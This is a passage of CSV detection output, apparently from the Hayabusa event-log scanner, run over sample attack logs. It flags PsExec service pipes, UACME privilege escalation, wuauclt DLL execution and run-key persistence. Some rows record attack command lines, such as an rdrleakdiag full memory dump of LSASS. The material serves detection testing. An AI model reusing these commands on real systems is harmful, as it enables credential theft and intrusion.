747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.364 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.371 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.377 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.385 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.399 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:20:11.245 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:20:11.247 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:42:00.726 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:00.969 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.092 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.093 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.093 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.182 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.182 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.182 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:15.033 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:15.525 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:15.530 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-28 12:47:36.197 +00:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.197 +00:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.197 +00:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.206 +00:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: BC47D85C-FAA9-5F68-0000-0010D9590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.215 +00:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.215 +00:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.630 +00:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-10-01 18:35:02.415 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.415 +00:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.415 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.606 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.606 +00:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.606 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.775 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 747F3D96-1903-5F76-0000-0010B85E0900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-05 20:43:58.351 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.351 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.390 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.390 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.394 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.394 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.451 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.451 +00:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.451 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.451 +00:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 22:28:20.530 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-05 22:28:20.530 +00:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-05 22:28:20.530 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-05 22:28:20.530 +00:00,LAPTOP-JU4M3I0E,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 21:40:30.910 +00:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/image_load_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-06 21:40:42.943 +00:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/image_load_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-06 22:11:17.572 +00:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:17.814 +00:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_sysmon/registry_event/registry_event_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:17.848 +00:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_sysmon/registry_event/registry_event_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:18.680 +00:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:18.680 +00:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:18.930 +00:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-13 20:11:42.278 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 00247C92-09FE-5F86-0000-0010AC861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-13 20:11:42.279 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-15 13:17:02.403 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.736 +00:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_sysmon/registry_set/registry_set_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.736 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.737 